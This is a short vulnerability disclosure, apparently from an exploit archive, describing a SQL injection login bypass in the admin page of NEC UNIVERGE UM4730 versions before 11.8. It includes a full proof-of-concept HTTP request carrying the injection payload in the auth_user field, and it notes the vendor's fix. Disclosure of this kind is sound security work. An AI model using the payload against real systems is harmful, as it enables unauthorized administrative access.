NEC Universe UM4730 SQL Injection

2017.07.22
Credit: b0x41s
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: NEC UNIVERGE UM4730 < 11.8 SQL injection # Vulnerbility: SQL injection login bypass # Date: 15-12-2016 # Exploit Author: b0x41s # Author web: https://www.xrayit.nl # Vendor Homepage: https://www.nec-enterprise.com # Category: webapps # Version: 11.6.0.31 # Tested on: Windows server 2008 Description: The auth_user parameter is vulnerable to SQL injection. The login can be bypassed. POC: POST /admin/index.php HTTP/1.1 Host: 127.0.0.1 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: https://127.0.0.1/admin/index.php Content-Type: application/x-www-form-urlencoded Content-Lenght: 105 Cookie: PHPSESSID=dadu22lsue7utch05a24lgp54; g_lang=en submitButton=submitButton%3dSing+in&formSubmitted=1&auth_pw=root&auth_user='%20or%201=1--%20-&login_language_select=de Fix answer from vendor: The WAC login page is no longer available to sql injection bypassing authentication.The fix was committed prior to releasing 11.8.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top